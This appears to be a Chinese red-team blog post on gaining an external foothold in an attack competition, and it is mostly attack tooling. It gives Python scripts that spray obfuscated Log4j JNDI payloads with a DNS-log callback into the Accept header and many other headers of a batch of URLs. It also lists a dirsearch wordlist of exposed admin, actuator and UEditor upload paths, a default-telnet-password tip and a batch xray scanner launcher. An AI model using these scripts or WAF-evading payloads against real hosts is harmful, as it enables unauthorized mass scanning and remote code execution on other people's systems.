前言
一场比赛最重要的环节就是外网打点,外网没点进不了内网一切都白瞎,在我的印象中,这几年比较火的漏洞是shiro
550/springboot rce/log4j
rce。第一时间肯定要先扫描提供的资产是不是存在上面的漏洞,快速打点。当然各大oa还财务系统也存在各种漏洞。
# 批量漏洞扫描 ## log4j
fuzz spring
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
| import requests import api.read_file import urllib3 import hashlib urllib3.disable_warnings() q = b'icon_hash="116323821" && country="CN"'
url_list = api.read_file.get_url_list('url.txt') hl = hashlib.md5() for url in url_list: hl.update(url.encode(encoding='utf-8')) print(url + '\t\t' + hl.hexdigest()) dnslog = 'dnslog' accept = '${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}:// ' + hl.hexdigest()[0:5] + dnslog + '/poc}' header = { 'Accept': accept } try: r = requests.get(url, headers=header, timeout=5, verify=False) except requests.exceptions.RequestException as e: print('请求出现异常')
|
fuzz 全部header
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
| import requests import api.read_file import urllib3 import hashlib urllib3.disable_warnings()
url_list = api.read_file.get_url_list('url.txt') hl = hashlib.md5() for url in url_list: hl.update(url.encode(encoding='utf-8')) print(url + '\t\t' + hl.hexdigest()) dnslog = 'dnslog' poc = '${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}:// ' + hl.hexdigest()[0:5] + dnslog + '/poc}' header = { 'Accept': 'accept' + '.' + poc, 'X-Client-IP': 'X-Client-IP' + '.' + poc, 'X-Remote-IP': 'X-Remote-IP' + '.' + poc, 'X-Remote-Addr': 'X-Remote-Addr' + '.' + poc, 'X-Forwarded-For': 'X-Forwarded-For' + '.' + poc, 'X-Originating-IP': 'X-Originating-IP' + '.' + poc, 'User-Agent': 'User-Agent' + '.' + poc, 'Referer': 'Referer' + '.' + poc, 'Authorization': 'Authorization' + '.' + poc
} try: r = requests.get(url, headers=header, timeout=5, verify=False) except requests.exceptions.RequestException as e: print('请求出现异常')
|
shiro
直接把所有流量走一遍burpsuite或者xray,效率最高。
telnet 无密码
使用webfinder-3.2可以扫描telnet默认密码
dirsearch使用自定义字典进行批量扫描
python ..py -w D:.txt -l "C:.txt" -p socks5://127.0.0.1:7772
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
| /actuator/env /admin/v2/api-docs /api/actuator/env /api/druid/index.html /api/env /api/v1/api-docs /api/v2/api-docs /api/v3/api-docs /druid/index.html /env /nacos/ /service /Service.asmx?wsdl /statics/ueditor/php/controller.php?action=uploadfile /swagger-ui.html /swagger/v1/swagger.json /UEditor/asp/controller.asp?action=uploadfile /ueditor/php/controller.php?action=uploadfile /v1/api-docs /v2/api-docs /v3/api-docs
|
xray多线程扫描
1 2 3 4 5 6 7 8 9 10 11 12 13
| import os import time import random import string import subprocess
file_path = '../asset/out' for filename in os.listdir(file_path): t = time.time() html_filename = str(int(t)) + "".join(random.sample(string.ascii_letters + string.digits, 5)) + '.html' cmd = ['xray', 'ws', '--url-file', filename, '--html-output', html_filename] subprocess.Popen(cmd, creationflags=subprocess.CREATE_NEW_CONSOLE)
|